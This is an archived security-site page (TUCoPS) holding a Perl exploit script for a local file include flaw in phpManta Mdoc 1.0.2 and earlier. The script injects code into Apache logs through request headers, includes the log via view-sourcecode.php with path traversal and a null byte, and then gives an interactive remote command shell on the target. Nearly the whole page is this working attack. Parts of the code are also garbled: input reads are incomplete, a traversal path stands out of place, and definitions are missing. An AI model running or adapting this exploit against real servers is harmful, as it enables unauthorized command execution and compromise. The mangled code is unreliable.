TUCoPS :: Web :: PHP :: b06-5692.htm

phpManta - Mdoc <= 1.0.2 (view-sourcecode.php) Local File Include Exploit
phpManta - Mdoc <= 1.0.2 (view-sourcecode.php) Local File Include Exploit
phpManta - Mdoc <= 1.0.2 (view-sourcecode.php) Local File Include Exploit

#[Script Name: phpManta - Mdoc <= 1.0.2 (view-sourcecode.php) Local File Include Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Contact    : :(
use IO::Socket;
use LWP::Simple;
"../../.. /../../var/www/logs/access_log",
if (@ARGV < 3){
print "
[=======================================================================[//  phpManta - Mdoc <= 1.0.2 (view-sourcecode.php) Local File Include Exploit
[//           Usage: manta.pl [target] [path] [apachepath]
[//                   Example: manta.pl victim.com /manta/ ../logs/error.log
[//                           Vuln&Exp : ajann


print "Injecting code in log files...\n";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
print "Write END to exit!\n";
print "IF not working try another apache path\n\n";

print "[shell] ";$cmd = ;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
    print $socket "GET ".$path."Mdoc/view-sourcecode.php?file=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
        print $raspuns;

    print "[shell] ";
    $cmd = ;

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH